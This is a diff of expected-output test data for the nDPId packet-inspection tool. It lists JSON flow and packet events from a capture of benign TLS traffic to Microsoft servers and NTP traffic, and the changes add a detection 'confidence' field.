 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1626168080092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168080092,"pkt":"WNVuaKQA8BiYFWV8CABFAABMx3MAAEARqBTAqAF5Ef02+\/5LAHsAONKdIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1626168080122,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168080122,"pkt":"8BiYFWV8WNVuaKQACABFAABMV31AADcR4QoR\/Tb7wKgBeQB7\/ksAOLQqJAED6wAAAAAAAAANU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQLKsA6OSX2ZAsrLL1"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"}
@@ -161,59 +161,59 @@
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, 